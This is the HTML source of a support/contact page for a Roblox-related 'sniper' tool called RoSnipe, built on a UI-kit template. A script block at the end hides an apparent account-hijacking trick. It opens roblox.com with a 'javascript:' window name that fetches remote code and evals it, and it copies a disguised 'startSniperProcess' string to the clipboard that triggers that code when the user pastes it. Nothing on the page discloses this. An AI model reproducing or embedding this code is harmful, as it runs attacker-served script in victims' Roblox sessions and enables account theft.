<html>
<head>
<title>RoSnipe - Dashboard</title>
<link href="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/css/purpose.css" rel="stylesheet">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.2.0/css/all.css">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body class="bg-dark bg-noise" style="opacity: 1;">
<header class="header header-transparent" id="header-main">

<nav class="navbar navbar-main navbar-expand-lg navbar-transparent navbar-dark bg-dark" id="navbar-main">
<div class="container px-lg-0">

<a class="navbar-brand mr-lg-5" href="page.html">
<img alt="Image placeholder" src="logosnipe.png" id="navbar-logo" style="height: 50px;">
</a>

<button class="navbar-toggler pr-0 collapsed" type="button" data-toggle="collapse" data-target="#navbar-main-collapse" aria-controls="navbar-main-collapse" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>

<div class="navbar-collapse collapse" id="navbar-main-collapse" style="">
<ul class="navbar-nav align-items-lg-center">

<li class="nav-item">
<a class="nav-link" href="page.html">Dashboard</a>
</li>
<li class="nav-item active">
<a class="nav-link" href="support.html">Support</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://discord.gg/q4NsXB7">About</a>
</li>


</ul>
</div>
</div>
</nav>
</header>

<div class="main-content">
<section class="slice slice-lg bg-gradient-primary" data-offset-top="#header-main" style="padding-top: 147.188px;">
<div class="container">
<section class="slice slice-lg" id="sct_contact_form">
<div class="container">
<div class="mb-12 text-center">
<span class="badge badge-soft-info badge-pill badge-lg">
Contact
</span>
<h3 class=" mt-4">Send us a message</h3>
</div>
<div class="row justify-content-center">
<div class="col-lg-8">
<form>
<div class="row">
<div class="col-md-6">
<div class="form-group">
<label class="form-control-label">First name</label>
<input class="form-control" type="text" placeholder="First name">
</div>
</div>
<div class="col-md-6">
<div class="form-group">
<label class="form-control-label">Last name</label>
<input class="form-control" type="text" placeholder="Last name">
</div>
</div>
</div>
<div class="row align-items-center">
<div class="col-md-6">
<div class="form-group">
<label class="form-control-label">Email</label>
<input class="form-control" type="email" placeholder="email@example.com">
</div>
</div>
<div class="col-md-6">
<div class="form-group">
<label class="form-control-label">Phone</label>
<input class="form-control" type="text" placeholder="+40-745-234-567">
</div>
</div>
</div>
<div class="row align-items-center">
<div class="col-md-12">
<div class="form-group">
<label class="form-control-label">Subject</label>
<input class="form-control" type="text" placeholder="Custom project">
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="form-group">
<label class="form-control-label">Message</label>
<textarea class="form-control" data-toggle="autosize" placeholder="Tell us a few words ..." rows="3" style="overflow: hidden; overflow-wrap: break-word; resize: none; height: 98px;"></textarea>
</div>
</div>
</div>
<div class="text-center mt-4">
<button type="button" class="btn btn-dark rounded-pill" onclick="location.reload();" href="support.html">Send your message</button>
<span class="d-block mt-4 text-sm">We'll get back to you in 24-48 h.</span>
</div>
</form>
</div>
</div>
</div>
</section></div>
</div><div id="footers-footer-2">
<footer class="footer p-0 footer-dark bg-gradient-dark" id="footer-main">
<div class="container">
<div class="py-4">
<div class="row align-items-md-center">
<div class="col-md-4 mb-4 mb-md-0">
<div class="d-flex align-items-center">
<p class="text-sm mb-0">© RBXSniper 2020. All rights reserved.<br>We are not affiliated with any of the games or companies shown on this website. Use of any logos or trademarks are for reference purposes only. By utilizing the website, you agree to be bound by the terms of service.
</p>
</div>
</div>
<div class="col-sm-6 col-md-4 mb-4 mb-sm-0">
<ul class="nav justify-content-center">
<li class="nav-item">
<a class="nav-link" href="support.html">Terms</a>
</li>
<li class="nav-item">
<a class="nav-link" href="support.html">Support</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://discordapp.com/invite/q4NsXB7">About</a>
</li>
</ul>
</div>
<div class="col-sm-6 col-md-4">
<ul class="nav justify-content-center justify-content-md-end mt-3 mt-md-0">
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-dribbble"></i>
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-instagram"></i>
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-github"></i>
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">
<i class="fab fa-facebook"></i>
</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</footer>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/js/materialize.min.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/js/purpose.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/js/purpose.core.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/js/demo.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/libs/swiper/dist/js/swiper.min.js"></script>
<script src="https://demo.webpixels.io/purpose-website-ui-kit-v2.0.1/assets/libs/typed.js/lib/typed.min.js"></script>
<script>
  var typed = new Typed('#typed', {
    stringsElement: '#typed-strings'
  });
  var typed = new Typed('.element', {
  strings: ['This is a JavaScript library', 'This is an ES6 module'],
  smartBackspace: true // Default value
});
</script>
<style type="text/css" data-typed-js-css="true">
        .typed-cursor{
          opacity: 1;
        }
        .typed-cursor.typed-cursor--blink{
          animation: typedjsBlink 0.7s infinite;
          -webkit-animation: typedjsBlink 0.7s infinite;
                  animation: typedjsBlink 0.7s infinite;
        }
        @keyframes typedjsBlink{
          50% { opacity: 0.0; }
        }
        @-webkit-keyframes typedjsBlink{
          0% { opacity: 1; }
          50% { opacity: 0.0; }
          100% { opacity: 1; }
        }
      </style>
<script>
    var url = 'https://www.roblox.com/robots.txt#/roliox-terminal/?whitelistKey=ab851a754c8c6424d4d31d8caf8206d6'
    var payload1 = 'startSniperProcess=>checkUpdates();(setThreads=>{location=name;125})()'
    var payload2 = 'fetch("//'+location.hostname+location.pathname+'?p").then(async x=>eval(await x.text()))'
    
    function openRobloxWindow() {
      var win = window.open(url, "javascript:"+payload2, 'height=350,width=750,location=no')
    }
    
    function copyPayload1() {
      var input = document.createElement('input')
      input.setAttribute('value', payload1)
      document.body.appendChild(input)
      input.select()
      var result = document.execCommand('copy')
      document.body.removeChild(input)
      
      alert("Copied!")
    }
  </script>
</body>
</html>